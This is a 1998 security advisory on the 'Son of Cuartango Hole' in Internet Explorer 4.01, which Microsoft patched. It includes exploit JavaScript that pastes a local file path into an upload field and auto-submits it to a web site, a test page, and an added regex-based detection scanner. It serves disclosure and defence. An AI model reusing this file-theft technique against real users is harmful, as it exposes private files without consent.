Son of Cuartango Hole in MSIE 4.01

The Son of Cuartango Hole 

http://pages.whowhere.com/computers/cuartangojc/son1.html

Affected software
Microsoft Internet Explorer 4.01

Fixes
Microsoft has released a fix: see the Microsoft Security Site,
http://www.microsoft.com/security/bulletins/ms98-015.asp
Microsoft names the vulnerability "Untrusted Scripted Paste" (USP).
They have created a new USP patch.

Technical description

There is an input form field used to transfer files from the browsing computer to a web site; this
input field is HTML coded as:

<input type="file" name="filename" size="30">

Theoretically this input field can be filled only by the user, by clicking a "Browse" button or
typing the file name.
In order to avoid a security hole, scripts are not allowed to modify the value of this input
field; the statement below will not work:

document.forms[0].filename = "C:\config.sys";

The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file
name into the input field. Microsoft's old USP patch fixed this single "copy and paste"
vulnerability.
There is a workaround that makes the "paste" operation work again. The idea is: create a "textrange"
object from the selection of the file input and then paste over this "textrange" object.

The code below is a bit more sophisticated than the "Cuartango Hole" code:

T1 is a hidden input field, defined in a second form, containing the file pathname to be copied to
the clipboard.


<body onload="getfile()">

function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
var rng = document.selection.createRange();
rng.execCommand("paste");
document.forms[0].submit();
}

The result is that the file is POSTED to the malicious web site defined in the form action
property.
Similar code will also work inside an HTML formatted e-mail.

The Cuartango Hole code was very similar:

function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
document.execCommand("paste");
document.forms[0].submit();
}
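As an added example (not code from the advisory, from Microsoft's patch, or from the author), a small heuristic scanner that a mail gateway or web proxy could run over incoming HTML to flag the ingredients of both variants above: a file input, a scripted clipboard copy and paste, the TextRange form of the paste, and an onload trigger with automatic submit. The function name, the rule names, the placeholder action URL and the two constructed sample pages are assumptions.

```javascript
// Added example, not code from the advisory: heuristic scanner for the
// "Untrusted Scripted Paste" ingredients (function and rule names are assumptions).
const RULES = [
  { id: "file-input",     re: /<input[^>]*type\s*=\s*["']?file\b/ },
  { id: "script-copy",    re: /execcommand\s*\(\s*["']copy["']\s*\)/ },
  { id: "script-paste",   re: /execcommand\s*\(\s*["']paste["']\s*\)/ },
  { id: "textrange",      re: /selection\s*\.\s*createrange\s*\(/ },
  { id: "onload-trigger", re: /<body[^>]*\bonload\s*=/ },
  { id: "auto-submit",    re: /forms\s*\[\s*\d+\s*\]\s*\.\s*submit\s*\(/ },
];
function scanForScriptedPaste(html) {
  const src = html.toLowerCase();            // rules are written lowercase-only
  const hits = RULES.filter(r => r.re.test(src)).map(r => r.id);
  // The hole needs a file input plus a script-driven paste; the other hits only
  // raise confidence (auto-run, auto-submit) or tell the two variants apart.
  const core = hits.includes("file-input") && hits.includes("script-paste");
  const variant = !core ? "none"
    : hits.includes("textrange") ? "son-of-cuartango (TextRange paste)"
    : "cuartango (direct document paste)";
  return { suspicious: core, variant, hits };
}

// Constructed sample: the structure of the advisory's test page (placeholder action URL).
const SAMPLE_SON = `
<body onload="getfile()">
<script>
function getfile() {
  document.forms[0].filename.select();
  var rng = document.selection.createRange();
  document.forms[1].T1.select();
  document.execCommand("copy");
  rng.execCommand("paste");
  document.forms[0].submit();
}
</script>
<form enctype="multipart/form-data" method="post" action="http://example.invalid/up">
  <input type="file" name="filename" size="15">
</form>
<form method="POST"><input type="hidden" name="T1" value="/test.txt"></form>
</body>`;

// Constructed sample: an ordinary upload form where only the user picks the file.
const SAMPLE_BENIGN = `
<body><form enctype="multipart/form-data" method="post" action="/upload">
  <input type="file" name="document"> <input type="submit" value="Send">
</form>
<script>document.forms[0].onsubmit = function () { return confirm("Upload?"); };</script>
</body>`;
console.log(scanForScriptedPaste(SAMPLE_SON), scanForScriptedPaste(SAMPLE_BENIGN));
```

The benign form still registers the "file-input" hit on its own, which is expected: only the combination with a script-issued paste is treated as suspicious.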



Example Exploit

<html>

<head>
<meta name="keywords"
content="son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer">
<title>Son of Cuartango Hole Test</title>
<bgsound src="images/gallarda.mid" loop="-1">
</head>

<body onload="getfile()">
<script language="JavaScript">

function getfile()
{
document.forms[0].filename.select(); // onload="getfile()"
var rng = document.selection.createRange();
document.forms[1].T1.select();
document.execCommand("copy");
rng.execCommand("paste");
if(document.forms[0].filename.value == "")
        alert("Your browser does not have the security hole");
else
        alert("Security hole in browser -- " + navigator.userAgent );
}

</script>


<p align="center"><big><font color="#FF0000"><big><big>The Son of Cuartango Hole Test</big></big></font></big></p>

<p align="center">&nbsp;</p>
<small>

<form enctype="multipart/form-data" method="post"
action="http://www.angelfire.com/cgi-bin/bedit">
  <div align="center"><center><p><strong>This is a test to verify if you are affected by the
  Son of Cuartango Hole</strong>.<br>
  <strong>If the file name (/test.txt) is made visible in the box below then you are affected.</strong></p>
  </center></div><div align="center"><center><p>&nbsp;<input type="file" name="filename"
  size="15"></p>
  </center></div>
</form>

<form method="POST">
  <input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>
</form>
</small>

<p align="center"><font size="3" color="#0000FF"><a href="http://pages.whowhere.com/computers/cuartangojc/son1.html"><strong>Back to Son Of
Cuartango Hole page</strong></a></font></p>

<p align="center">&nbsp;&nbsp;&nbsp; <a href="mailto:cuartangojc@mx3.redestb.es">Juan
Carlos García Cuartango</a></p>

<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>
</small></font></p>

<p><font size="2" face="Garamond">Last update&nbsp;1998&nbsp; Nov 15, Year of Our Lord
1998 </font></p>
</body>
</html>
